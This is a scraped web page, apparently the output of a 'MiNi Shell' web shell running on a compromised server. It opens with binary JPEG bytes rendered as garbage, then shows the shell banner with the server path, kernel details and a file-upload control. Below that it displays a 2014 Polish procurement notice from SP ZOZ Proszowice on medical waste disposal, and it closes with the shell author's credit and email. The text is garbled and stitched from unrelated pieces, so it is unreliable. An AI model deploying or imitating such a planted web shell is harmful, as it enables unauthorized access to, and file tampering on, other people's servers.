JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141218/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141218/261365-N-2014.html

<p class="kh_header"><b>Proszowice: Świadczenie kompleksowych usług polegających na odbiorze, transporcie i unieszkodliwianiu odpadów medycznych wytworzonych na terenie SP ZOZ w Proszowicach.</b><br>
<b>Numer ogłoszenia: 261365 - 2014; data zamieszczenia: 18.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Opieki Zdrowotnej , ul. Kopernika 13, 32-100 Proszowice, woj. małopolskie, tel. 012 3865105, faks 012 3865258.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzoz.proszowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie kompleksowych usług polegających na odbiorze, transporcie i unieszkodliwianiu odpadów medycznych wytworzonych na terenie SP ZOZ w Proszowicach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Usługa winna być wykonana zgodnie z przepisami ustawy z 14 grudnia 2012r. o odpadach Dz. U. 2013r., poz. 21 z późniejszymi zmianami, Rozporządzenie Ministra Środowiska z dnia 27.09.2001r. w sprawie katalogu odpadów Dz. U. 2001r., Nr 112 poz. 1206 z późniejszymi zmianami, Rozporządzenia Ministra Zdrowia z dnia 30 lipca 2010r. w sprawie szczegółowego sposobu postępowania z odpadami medycznymi Dz. U. 2010r., Nr 139 poz. 940, Rozporządzenia Ministra Zdrowia z dnia 23 grudnia 2002r. w sprawie dopuszczalnych sposobów i warunków unieszkodliwiania odpadów medycznych i weterynaryjnych Dz. U. 2003r., Nr 8 poz. 104, Rozporządzenie Ministra Środowiska z dnia 8 grudnia 2010 r. w sprawie wzorów dokumentów stosowanych na potrzeby ewidencji odpadów Dz. U. Z 2010r., Nr 249, poz. 1673 oraz Rozporządzenie Ministra Środowiska z dnia 13 stycznia 2014r. w sprawie dokumentu potwierdzającego unieszkodliwienie zakaźnych odpadów medycznych lub zakaźnych odpadów weterynaryjnych Dz. U. 2014r., poz. 107.
	 Wykonawca zobowiązany będzie do unieszkodliwiania odpadów medycznych powstałych z diagnozowania, leczenia i profilaktyki medycznej o kodach: 18 01 02, 18 01 03, 18 01 06, 18 01 09, 18 01 82. 
	Odbiór odpadów medycznych musi odbywać się co 72 godziny w godzinach kontenerów. Odpady o kodzie 18 01 02 należy odbierać z zamrażarki znajdującej się w pomieszczeniu przy Kotłowni.
	Wykonawca zobowiązany będzie do dostarczania w wyznaczonym miejscu sprawnych mechanicznie kontenerów w ilości odpowiedniej do masy gromadzonych odpadów medycznych.
	 Kontenery muszą posiadać następujące cechy użytkowe:
pojemność winna wynosić 1m3,
muszą gwarantować bezpieczne zamknięcie pojemnika w sposób uniemożliwiający otwarcie kontenera przez osoby nieupoważnione,
kontener powinien być oznaczony napisem - odpady medyczne- oraz określona masa własna kontenera  - tara),
mają być wyposażone w kółka jezdne i system blokady kierunku celem zapewnienia możliwości sprzątania miejsc gdzie rozstawione są kontenery. 
Zamawiający nie odpowiada za uszkodzenia kontenera powstałe w czasie transportu oraz stwierdzone po upływie 1 dnia od odbioru kontenera od Zamawiającego.
Świadczenie usług będące przedmiotem zamówienia winno być zgodne z przepisami ustawy z 14 grudnia 2012r. o odpadach Dz. U. 2013r., poz. 21 z późniejszymi zmianami. Na podstawie art. 20 w/w ustawy niebezpieczne odpady medyczne muszą być unieszkodliwiane najbliżej miejsca ich powstania lub na obszarze tego województwa, na którym zostały wytworzone. 
	Szacunkowa ilość odpadów medycznych o okresie trwania umowy, tj. 24 miesiące wynosi ok. 75 000 kg . Po odebraniu odpadów medycznych Wykonawca musi dostarczyć Szpitalowi wydruk z wagi elektronicznej zawierającej wagę wywożonych odpadów medycznych, datę i godzinę. Ponadto Wykonawca musi każdorazowo po opróżnieniu kontenerów przekazać wypełnioną Kartę Przekazania Odpadu Zamawiającemu, która zwiera sumę odebranych odpadów medycznych w danym dniu i stanowi podstawę do wystawienia faktury zgodnie z Rozporządzeniem Ministra Środowiska z dnia 8 grudnia 2010 r. w sprawie wzorów dokumentów stosowanych na potrzeby ewidencji odpadów (Dz. U. Z 2010r., Nr 249, poz. 1673). Ponadto, Wykonawca zobowiązany jest do przekazywania po każdym zakończonym miesiącu dokument potwierdzający unieszkodliwienie zakaźnych odpadów medycznych lub zakaźnych odpadów weterynaryjnych zgodnie z Rozporządzeniem Ministra Środowiska z dnia 13 stycznia 2014r. w sprawie dokumentu potwierdzającego unieszkodliwienie zakaźnych odpadów medycznych lub zakaźnych odpadów weterynaryjnych Dz. U. 2014r., poz. 107..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.52.42.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wadium w wysokości 5.000,00 zł (pięć tysięcy złotych) Wykonawca powinien wnieść przed upływem terminu składania ofert, w pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej (poręczenie kasy jest poręczeniem pieniężnym), gwarancjach bankowych, gwarancjach ubezpieczeniowych lub poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późniejszymi zmianami). Wybór formy wniesienia wadium należy do Wykonawcy.
2. Wadium w pieniądzu należy wnieść na rachunek Zamawiającego w Getin Noble Bank S.A. nr rachunku: 44 1560 0013 2991 7050 3000 0003. Wadium wniesione w pieniądzu uznaje się za wniesione w terminie, jeżeli najpóźniej w terminie jego wniesienia, określonym w ust. 1, zostanie uznany rachunek bankowy Zamawiającego na kwotę wadium.
3. W przypadku wniesienia wadium w formie gwarancji lub poręczenia, oryginał dokumentu należy złożyć w siedzibie SP ZOZ w Proszowicach, ul. Kopernika 13 pok.180 kasa, od poniedziałku do piątku w godz. 10.00 - 13.00, najpóźniej w terminie określonym w ust. 1. Treść dokumentu gwarancji lub poręczenia powinna zawierać w szczególności klauzulę, z której wynika zapłata kwoty wadium na rzecz Zamawiającego w przypadkach określonych w art. 46 ust. 4a i 5 ustawy.
4.Wadium powinno być wniesione na cały okres związania ofertą.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać zezwolenie na prowadzenie działalności lub czynności w zakresie termicznego przekształcania i transportu odpadów grupy 18 i dysponować instalacją do unieszkodliwiania odpadów medycznych na terenie Województwa Małopolskiego; 

Ocena spełniania powyższego warunku będzie dokonana na podstawie złożonego oświadczenia,  określonego w  części III.6) pkt1. i dokumentu określonego w części  III.6) pkt 2. i pkt 3. lub pkt4. ogłoszenia na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca złoży oświadczenie, że posiada wiedzę i doświadczenie do wykonania zamówienia i  wykaże  należyte  wykonanie  w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie co najmniej 2 usług   w zakresie przedmiotu zamówienia wykonanych lub wykonywanych w szpitalu  o wartości nie mniejszej niż 100 000, 00 zł każda usługa.  
Ocena spełniania przez Wykonawcę powyższego warunku będzie dokonana na podstawie złożonego oświadczenia,  określonego w  części III.6) pkt1. i dokumentu określonego w części III.6) pkt 5. i pkt 6.ogłoszenia na zasadzie spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w zakresie spełniania tego warunku.
Ocena spełniania przez Wykonawcę powyższego warunku będzie dokonana na podstawie złożonego oświadczenia,  określonego w  części III.6) pkt1. ogłoszenia na zasadzie spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w zakresie spełniania tego warunku.
Ocena spełniania przez Wykonawcę powyższego warunku będzie dokonana na podstawie złożonego oświadczenia,  określonego w  części III.6) pkt1.ogłoszenia na zasadzie spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej  z przedmiotem zamówienia na sumę ubezpieczenia (sumę gwarancyjną) nie mniejszą niż 150 000,00 zł. 

Ocena spełniania przez Wykonawcę powyższego warunku będzie dokonana na podstawie złożonego oświadczenia,  określonego w  części III.6) pkt1. i dokumentu określonego w części III.6) pkt 7. niniejszego ogłoszenia na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.Oświadczenie Wykonawcy o posiadaniu wolnych mocy przerobowych w instalacji unieszkodliwiania odpadów medycznych  do wykonania przedmiotu zamówienia.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu, o którym mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych. 
2. Zezwolenie na prowadzenie działalności w zakresie termicznego przekształcania i transportu odpadów grupy 18 zgodnie z Ustawą o odpadach  z 14 grudnia 2012r. (Dz. U. 2013r., poz. 21 z późniejszymi zmianami). 
3. Oświadczenie Wykonawcy o posiadaniu odpowiedniej spalarni odpadów medycznych  - dotyczy Wykonawcy posiadającego własną spalarnię;
4. Kserokopia umowy ze spalarnią mającą siedzibę na terenie Województwa Małopolskiego - dotyczy Wykonawcy nie posiadającego własnej spalarni ;
5. Wykaz  wykonanych , a w przypadku świadczeń okresowych lub ciągłych  również wykonywanych, głównych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie co najmniej 2 usług w zakresie przedmiotu zamówienia wykonanych lub wykonywanych , o wartości nie mniejszej niż 100 000, 00 PLN każda usługa                    z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz należy załączyć dowody (min. 2 dowody), czy usługi zostały wykonane lub są wykonywane należycie;
6. Dowodami, o których mowa w pkt 5. (powyżej) są poświadczenia, z tym że, w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert lub Oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia.
7. Opłacona polisa lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 150.000,00 złotych. / Jeśli data ważności polisy lub innego dokumentu ubezpieczenia upływa przed dniem zakończenia przedmiotowej umowy Wykonawca zobowiązany jest dostarczyć nową polisę w celu zachowania ciągłości ubezpieczenia.
8.Dokument/Oświadczenie Wykonawcy potwierdzający okres działalności w zakresie  unieszkodliwiania odpadów medycznych - ocena ofert w kryterium Doświadczenie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Doświadczenie - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zmiana postanowień niniejszej umowy może nastąpić wyłącznie na piśmie pod rygorem nieważności takiej zmiany.
2. Niedopuszczalna jest jednak pod rygorem nieważności zmiana postanowień umowy oraz wprowadzenie nowych postanowień umowy niekorzystnych dla Zleceniodawcy, jeżeli przy ich uwzględnieniu należałoby zmienić treść oferty, na podstawie której dokonano wyboru Zleceniobiorcy, chyba, że konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia niniejszej umowy.
3. Dopuszczalna jest zmiana treści Umowy w zakresie terminu jej realizacji lub szacowanej ilości Odpadów Medycznych jeśli w chwili takiej zmiany nie nastąpiło zrealizowanie wartości Przedmiotu Umowy, o którym mowa w ustępie 8.1. lub w szczególnych wypadkach związanych z koniecznością zapewnienia Zleceniodawcy ciągłości objętych Umową usług.
4. Dopuszczalna jest zmiana treści Umowy w zakresie wysokości Wynagrodzenia    w przypadku zmiany: stawki podatku od towarów i usług, wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę oraz zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne, jeżeli zmiany te będą miały wpływ na koszty wykonania Umowy przez Zleceniobiorcę. W takim wypadku Wynagrodzenie może być odpowiednio zmienione na wniosek Zleceniobiorcy z uwzględnieniem rzeczywistego wzrostu kosztu Wykonywania Umowy przez Zleceniobiorcę i wyłącznie o wartość wzrostu kosztów z powodu zmiany ww. przepisów prawa. Zleceniobiorca zobowiązany jest wykazać Zleceniodawcy faktyczny wzrost kosztu realizacji Umowy oraz zaproponowaną stawkę Wynagrodzenia uwzględniającą wzrost kosztu realizacji Umowy, z powodu zmiany ww. przepisów prawa.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzoz.proszowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zespół Opieki Zdrowotnej w Proszowicach
ul. Kopernika 13,  32-100 Proszowice
Dział Zamówień Publicznych
Cena SIWZ - 10,00 zł + VAT.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.12.2014 godzina 11:30, miejsce: Samodzielny Publiczny Zespół Opieki Zdrowotnej w Proszowicach
ul. Kopernika 13, 32-100 Proszowice
Budynek Główny I. piętro, SEKRETARIAT Dyrekcji.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com